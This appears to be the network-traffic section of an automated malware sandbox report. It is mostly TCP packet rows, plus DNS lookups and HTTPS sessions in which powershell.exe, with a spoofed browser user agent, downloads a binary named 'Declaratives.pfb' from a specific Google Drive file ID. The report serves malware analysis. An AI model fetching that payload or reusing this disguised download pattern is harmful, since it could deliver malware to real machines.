            Jul 3, 2024 08:52:18.887923956 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:18.887968063 CEST49739443192.168.2.4142.250.186.161
            Jul 3, 2024 08:52:18.890881062 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:18.891637087 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:18.891683102 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:18.891705036 CEST49739443192.168.2.4142.250.186.161
            Jul 3, 2024 08:52:18.891721964 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:18.893616915 CEST49739443192.168.2.4142.250.186.161
            Jul 3, 2024 08:52:18.895296097 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:18.895467043 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:18.895524979 CEST49739443192.168.2.4142.250.186.161
            Jul 3, 2024 08:52:18.895530939 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:18.899595022 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:18.899640083 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:18.899671078 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:18.899698973 CEST49739443192.168.2.4142.250.186.161
            Jul 3, 2024 08:52:18.899707079 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:18.899729013 CEST49739443192.168.2.4142.250.186.161
            Jul 3, 2024 08:52:18.899838924 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:18.899883986 CEST49739443192.168.2.4142.250.186.161
            Jul 3, 2024 08:52:18.899893999 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:18.903562069 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:18.903758049 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:18.903784037 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:18.903839111 CEST49739443192.168.2.4142.250.186.161
            Jul 3, 2024 08:52:18.903846979 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:18.903860092 CEST49739443192.168.2.4142.250.186.161
            Jul 3, 2024 08:52:18.907486916 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:18.907661915 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:18.907689095 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:18.907722950 CEST49739443192.168.2.4142.250.186.161
            Jul 3, 2024 08:52:18.907731056 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:18.907742023 CEST49739443192.168.2.4142.250.186.161
            Jul 3, 2024 08:52:18.911281109 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:18.911473036 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:18.911515951 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:18.911531925 CEST49739443192.168.2.4142.250.186.161
            Jul 3, 2024 08:52:18.911540031 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:18.911562920 CEST49739443192.168.2.4142.250.186.161
            Jul 3, 2024 08:52:18.914864063 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:18.914943933 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:18.914971113 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:18.915004015 CEST49739443192.168.2.4142.250.186.161
            Jul 3, 2024 08:52:18.915011883 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:18.915023088 CEST49739443192.168.2.4142.250.186.161
            Jul 3, 2024 08:52:18.918488026 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:18.918518066 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:18.918570995 CEST49739443192.168.2.4142.250.186.161
            Jul 3, 2024 08:52:18.918579102 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:18.921607971 CEST49739443192.168.2.4142.250.186.161
            Jul 3, 2024 08:52:18.921613932 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:18.921892881 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:18.921947002 CEST49739443192.168.2.4142.250.186.161
            Jul 3, 2024 08:52:18.921952963 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:18.922027111 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:18.922069073 CEST49739443192.168.2.4142.250.186.161
            Jul 3, 2024 08:52:18.922075033 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:18.925268888 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:18.925333023 CEST49739443192.168.2.4142.250.186.161
            Jul 3, 2024 08:52:18.925339937 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:18.925390005 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:18.925594091 CEST49739443192.168.2.4142.250.186.161
            Jul 3, 2024 08:52:18.925600052 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:18.933738947 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:18.933775902 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:18.933810949 CEST49739443192.168.2.4142.250.186.161
            Jul 3, 2024 08:52:18.933820963 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:18.933855057 CEST49739443192.168.2.4142.250.186.161
            Jul 3, 2024 08:52:18.934037924 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:18.934078932 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:18.934102058 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:18.934140921 CEST49739443192.168.2.4142.250.186.161
            Jul 3, 2024 08:52:18.934148073 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:18.934295893 CEST49739443192.168.2.4142.250.186.161
            Jul 3, 2024 08:52:18.934577942 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:18.935307026 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:18.935334921 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:18.935349941 CEST49739443192.168.2.4142.250.186.161
            Jul 3, 2024 08:52:18.935358047 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:18.935430050 CEST49739443192.168.2.4142.250.186.161
            Jul 3, 2024 08:52:18.935503960 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:18.937400103 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:18.937448025 CEST49739443192.168.2.4142.250.186.161
            Jul 3, 2024 08:52:18.937454939 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:18.937588930 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:18.937630892 CEST49739443192.168.2.4142.250.186.161
            Jul 3, 2024 08:52:18.937638998 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:18.939439058 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:18.939491034 CEST49739443192.168.2.4142.250.186.161
            Jul 3, 2024 08:52:18.939497948 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:18.941654921 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:18.941680908 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:18.941715956 CEST49739443192.168.2.4142.250.186.161
            Jul 3, 2024 08:52:18.941725016 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:18.941759109 CEST49739443192.168.2.4142.250.186.161
            Jul 3, 2024 08:52:18.943769932 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:18.943995953 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:18.944020987 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:18.944058895 CEST49739443192.168.2.4142.250.186.161
            Jul 3, 2024 08:52:18.944067955 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:18.944118977 CEST49739443192.168.2.4142.250.186.161
            Jul 3, 2024 08:52:18.948055983 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:18.948303938 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:18.948328018 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:18.948350906 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:18.948353052 CEST49739443192.168.2.4142.250.186.161
            Jul 3, 2024 08:52:18.948364973 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:18.948406935 CEST49739443192.168.2.4142.250.186.161
            Jul 3, 2024 08:52:18.954420090 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:18.954473019 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:18.954489946 CEST49739443192.168.2.4142.250.186.161
            Jul 3, 2024 08:52:18.954502106 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:18.954647064 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:18.954673052 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:18.954694986 CEST49739443192.168.2.4142.250.186.161
            Jul 3, 2024 08:52:18.954701900 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:18.954724073 CEST49739443192.168.2.4142.250.186.161
            Jul 3, 2024 08:52:18.960378885 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:18.960408926 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:18.960465908 CEST49739443192.168.2.4142.250.186.161
            Jul 3, 2024 08:52:18.960474014 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:18.960777998 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:18.960819006 CEST49739443192.168.2.4142.250.186.161
            Jul 3, 2024 08:52:18.960824966 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:18.961590052 CEST49739443192.168.2.4142.250.186.161
            Jul 3, 2024 08:52:18.964759111 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:18.964909077 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:18.964932919 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:18.964947939 CEST49739443192.168.2.4142.250.186.161
            Jul 3, 2024 08:52:18.964956045 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:18.965049982 CEST49739443192.168.2.4142.250.186.161
            Jul 3, 2024 08:52:18.965054989 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:18.971201897 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:18.971259117 CEST49739443192.168.2.4142.250.186.161
            Jul 3, 2024 08:52:18.971266031 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:18.971517086 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:18.971546888 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:18.971556902 CEST49739443192.168.2.4142.250.186.161
            Jul 3, 2024 08:52:18.971563101 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:18.971613884 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:18.971652031 CEST49739443192.168.2.4142.250.186.161
            Jul 3, 2024 08:52:18.971657991 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:18.971688032 CEST49739443192.168.2.4142.250.186.161
            Jul 3, 2024 08:52:18.976609945 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:18.976892948 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:18.976919889 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:18.977009058 CEST49739443192.168.2.4142.250.186.161
            Jul 3, 2024 08:52:18.977020979 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:18.977199078 CEST49739443192.168.2.4142.250.186.161
            Jul 3, 2024 08:52:18.977206945 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:18.983994007 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:18.984148979 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:18.984179020 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:18.984206915 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:18.984231949 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:18.984263897 CEST49739443192.168.2.4142.250.186.161
            Jul 3, 2024 08:52:18.984275103 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:18.984298944 CEST49739443192.168.2.4142.250.186.161
            Jul 3, 2024 08:52:18.988969088 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:18.989160061 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:18.989187002 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:18.989214897 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:18.989238024 CEST49739443192.168.2.4142.250.186.161
            Jul 3, 2024 08:52:18.989249945 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:18.989276886 CEST49739443192.168.2.4142.250.186.161
            Jul 3, 2024 08:52:18.989295006 CEST49739443192.168.2.4142.250.186.161
            Jul 3, 2024 08:52:18.989300013 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:18.996074915 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:18.996191978 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:18.996217966 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:18.996279955 CEST49739443192.168.2.4142.250.186.161
            Jul 3, 2024 08:52:18.996289968 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:18.996316910 CEST49739443192.168.2.4142.250.186.161
            Jul 3, 2024 08:52:18.996489048 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:18.996527910 CEST49739443192.168.2.4142.250.186.161
            Jul 3, 2024 08:52:18.996535063 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:18.999908924 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:19.000104904 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:19.000135899 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:19.000169992 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:19.000195980 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:19.000255108 CEST49739443192.168.2.4142.250.186.161
            Jul 3, 2024 08:52:19.000255108 CEST49739443192.168.2.4142.250.186.161
            Jul 3, 2024 08:52:19.000283957 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:19.000339985 CEST49739443192.168.2.4142.250.186.161
            Jul 3, 2024 08:52:19.003479958 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:19.003520012 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:19.003577948 CEST49739443192.168.2.4142.250.186.161
            Jul 3, 2024 08:52:19.003587008 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:19.003690958 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:19.003731966 CEST49739443192.168.2.4142.250.186.161
            Jul 3, 2024 08:52:19.003739119 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:19.003778934 CEST49739443192.168.2.4142.250.186.161
            Jul 3, 2024 08:52:19.003925085 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:19.010749102 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:19.010818958 CEST49739443192.168.2.4142.250.186.161
            Jul 3, 2024 08:52:19.010828018 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:19.011029959 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:19.011061907 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:19.011080027 CEST49739443192.168.2.4142.250.186.161
            Jul 3, 2024 08:52:19.011087894 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:19.011208057 CEST49739443192.168.2.4142.250.186.161
            Jul 3, 2024 08:52:19.011214972 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:19.013864994 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:19.013894081 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:19.013921022 CEST49739443192.168.2.4142.250.186.161
            Jul 3, 2024 08:52:19.013927937 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:19.014127970 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:19.014151096 CEST49739443192.168.2.4142.250.186.161
            Jul 3, 2024 08:52:19.014156103 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:19.014168978 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:19.014198065 CEST49739443192.168.2.4142.250.186.161
            Jul 3, 2024 08:52:19.022300005 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:19.022335052 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:19.022409916 CEST49739443192.168.2.4142.250.186.161
            Jul 3, 2024 08:52:19.022418022 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:19.022707939 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:19.022733927 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:19.022756100 CEST49739443192.168.2.4142.250.186.161
            Jul 3, 2024 08:52:19.022763014 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:19.022778034 CEST49739443192.168.2.4142.250.186.161
            Jul 3, 2024 08:52:19.023885965 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:19.023940086 CEST49739443192.168.2.4142.250.186.161
            Jul 3, 2024 08:52:19.023947954 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:19.024126053 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:19.024355888 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:19.024379969 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:19.024403095 CEST49739443192.168.2.4142.250.186.161
            Jul 3, 2024 08:52:19.024410009 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:19.024430037 CEST49739443192.168.2.4142.250.186.161
            Jul 3, 2024 08:52:19.028143883 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:19.028237104 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:19.028284073 CEST49739443192.168.2.4142.250.186.161
            Jul 3, 2024 08:52:19.028291941 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:19.028448105 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:19.028476000 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:19.028496981 CEST49739443192.168.2.4142.250.186.161
            Jul 3, 2024 08:52:19.028505087 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:19.028515100 CEST49739443192.168.2.4142.250.186.161
            Jul 3, 2024 08:52:19.032351971 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:19.032537937 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:19.032565117 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:19.032594919 CEST49739443192.168.2.4142.250.186.161
            Jul 3, 2024 08:52:19.032596111 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:19.032609940 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:19.032622099 CEST49739443192.168.2.4142.250.186.161
            Jul 3, 2024 08:52:19.032646894 CEST49739443192.168.2.4142.250.186.161
            Jul 3, 2024 08:52:19.032864094 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:19.036936998 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:19.037017107 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:19.037066936 CEST49739443192.168.2.4142.250.186.161
            Jul 3, 2024 08:52:19.037075996 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:19.037167072 CEST49739443192.168.2.4142.250.186.161
            Jul 3, 2024 08:52:19.037214041 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:19.043028116 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:19.043078899 CEST49739443192.168.2.4142.250.186.161
            Jul 3, 2024 08:52:19.043087959 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:19.043138027 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:19.043200016 CEST49739443192.168.2.4142.250.186.161
            Jul 3, 2024 08:52:19.043207884 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:19.043570042 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:19.043602943 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:19.043622971 CEST49739443192.168.2.4142.250.186.161
            Jul 3, 2024 08:52:19.043629885 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:19.043709040 CEST49739443192.168.2.4142.250.186.161
            Jul 3, 2024 08:52:19.053483963 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:19.053582907 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:19.053652048 CEST49739443192.168.2.4142.250.186.161
            Jul 3, 2024 08:52:19.053661108 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:19.053807974 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:19.053834915 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:19.053852081 CEST49739443192.168.2.4142.250.186.161
            Jul 3, 2024 08:52:19.053858995 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:19.053925991 CEST49739443192.168.2.4142.250.186.161
            Jul 3, 2024 08:52:19.059819937 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:19.059865952 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:19.059953928 CEST49739443192.168.2.4142.250.186.161
            Jul 3, 2024 08:52:19.059962034 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:19.060152054 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:19.060175896 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:19.060195923 CEST49739443192.168.2.4142.250.186.161
            Jul 3, 2024 08:52:19.060203075 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:19.060266018 CEST49739443192.168.2.4142.250.186.161
            Jul 3, 2024 08:52:19.065293074 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:19.065403938 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:19.065450907 CEST49739443192.168.2.4142.250.186.161
            Jul 3, 2024 08:52:19.065459013 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:19.065646887 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:19.065665007 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:19.065690994 CEST49739443192.168.2.4142.250.186.161
            Jul 3, 2024 08:52:19.065696955 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:19.065803051 CEST49739443192.168.2.4142.250.186.161
            Jul 3, 2024 08:52:19.065907001 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:19.065965891 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:19.066010952 CEST49739443192.168.2.4142.250.186.161
            Jul 3, 2024 08:52:19.066101074 CEST49739443192.168.2.4142.250.186.161

            UDP Packets

            TimestampSource PortDest PortSource IPDest IP
            Jul 3, 2024 08:52:16.274894953 CEST5686153192.168.2.41.1.1.1
            Jul 3, 2024 08:52:16.282908916 CEST53568611.1.1.1192.168.2.4
            Jul 3, 2024 08:52:17.313281059 CEST5384453192.168.2.41.1.1.1
            Jul 3, 2024 08:52:17.320781946 CEST53538441.1.1.1192.168.2.4

            DNS Queries

            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
            Jul 3, 2024 08:52:16.274894953 CEST192.168.2.41.1.1.10xab56Standard query (0)drive.google.comA (IP address)IN (0x0001)false
            Jul 3, 2024 08:52:17.313281059 CEST192.168.2.41.1.1.10x1393Standard query (0)drive.usercontent.google.comA (IP address)IN (0x0001)false

            DNS Answers

            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
            Jul 3, 2024 08:52:16.282908916 CEST1.1.1.1192.168.2.40xab56No error (0)drive.google.com142.250.185.174A (IP address)IN (0x0001)false
            Jul 3, 2024 08:52:17.320781946 CEST1.1.1.1192.168.2.40x1393No error (0)drive.usercontent.google.com142.250.186.161A (IP address)IN (0x0001)false

            HTTP Request Dependency Graph

            • drive.google.com
            • drive.usercontent.google.com

            HTTPS Proxied Packets

            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            0192.168.2.449738142.250.185.1744438096C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            TimestampBytes transferredDirectionData
            2024-07-03 06:52:16 UTC215OUTGET /uc?export=download&id=1y-srWy9WsTxO0ac2NVg8A2aUmnT3VqyC HTTP/1.1
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
            Host: drive.google.com
            Connection: Keep-Alive
            2024-07-03 06:52:17 UTC1598INHTTP/1.1 303 See Other
            Content-Type: application/binary
            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
            Pragma: no-cache
            Expires: Mon, 01 Jan 1990 00:00:00 GMT
            Date: Wed, 03 Jul 2024 06:52:17 GMT
            Location: https://drive.usercontent.google.com/download?id=1y-srWy9WsTxO0ac2NVg8A2aUmnT3VqyC&export=download
            Strict-Transport-Security: max-age=31536000
            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
            Content-Security-Policy: script-src 'nonce-BHj6huSyO8UCn2uNCo8MKA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
            Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
            Cross-Origin-Opener-Policy: same-origin
            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
            Server: ESF
            Content-Length: 0
            X-XSS-Protection: 0
            X-Frame-Options: SAMEORIGIN
            X-Content-Type-Options: nosniff
            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
            Connection: close


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            1192.168.2.449739142.250.186.1614438096C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            TimestampBytes transferredDirectionData
            2024-07-03 06:52:17 UTC233OUTGET /download?id=1y-srWy9WsTxO0ac2NVg8A2aUmnT3VqyC&export=download HTTP/1.1
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
            Host: drive.usercontent.google.com
            Connection: Keep-Alive
            2024-07-03 06:52:18 UTC4828INHTTP/1.1 200 OK
            Content-Type: application/octet-stream
            Content-Security-Policy: sandbox
            Content-Security-Policy: default-src 'none'
            Content-Security-Policy: frame-ancestors 'none'
            X-Content-Security-Policy: sandbox
            Cross-Origin-Opener-Policy: same-origin
            Cross-Origin-Embedder-Policy: require-corp
            Cross-Origin-Resource-Policy: same-site
            X-Content-Type-Options: nosniff
            Content-Disposition: attachment; filename="Declaratives.pfb"
            Access-Control-Allow-Origin: *
            Access-Control-Allow-Credentials: false
